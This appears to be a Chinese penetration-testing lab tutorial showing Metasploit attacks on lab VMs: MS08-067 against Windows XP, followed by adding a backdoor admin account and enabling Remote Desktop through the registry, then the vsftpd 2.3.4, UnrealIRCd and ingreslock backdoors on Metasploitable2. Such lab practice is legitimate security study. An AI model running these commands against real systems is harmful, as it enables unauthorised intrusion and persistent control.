一、Kali Linux黑掉WindowsXP
1.首先,在Kali用命令 msfconsole 开启Metasploit。
2.然后运行如下命令:useexploit/windows/smb/ms08_067_netapi#使用MS08067漏洞攻击程序set LHOST 192.168.234.128 #设置本地主机IPset RHOST192.168.234.132 #设置目标主机IPset payload windows/shell_bind_tcp#设置payloadshow options #查看设置信息exploit #实施攻击由图可知,攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。
3.添加用户名为yangyan,密码为yangyan的用户,并把zeal用户添加到管理组,执行语句:net user yangyan yangyan /add && net localgroup administratorsyangyan /add
4.接下来执行命令 netstat -an 看一下目标主机开放端口的情况
5.发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal”“Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
这时我们打开目标机windowsXp发现多了一个管理员用户“yangyan”,这就是刚刚我在攻击机kaliLinux创建的。
7.入侵成功
8.接下来就在windowsxp靶机上进入各种破坏,比如我在C盘创建一个名为test的文件
回到靶机windows中发现创建成功(删除靶机里的文件同理)
二、利用Metasploitable2Linux漏洞入侵
1.Metasploitable2 在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个版本的后门会在6200端口上打开一个监听的shell。
(1)首先在Kali虚拟机中启动Metasploit的服务
(2)启动Metasploit后,在命令行中输search vsftp以寻找利用工具
(3)在Metasploit中输入useexploit/unix/ftp/vsftpd_234_backdoor,同时输入show options,以查看设置选项,然后设置IP,setrhost 192.168.234.129,最后输入命令exploit,
(4)输入exploit之后,已连接至Metasploitable2的靶机后门,可以输入任意命令进行查看
2. 在Metasploitable2 的6667端口上运行着UnreaIRCD IRC的守护进程。通过在一个系统命令后面添加两个字母”AB“发送给被攻击服务器任意一个监听该端口来触发。metasploit上已经已经有攻击模块来获得一个交互的shell。
3. 在少数服务器上存在一个古老的令人惊讶的“ingreslock”后门,监听1524端口。在过去的十年里,它经常被用于入侵一个暴露的服务器。试验如下:
扫一扫
925
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
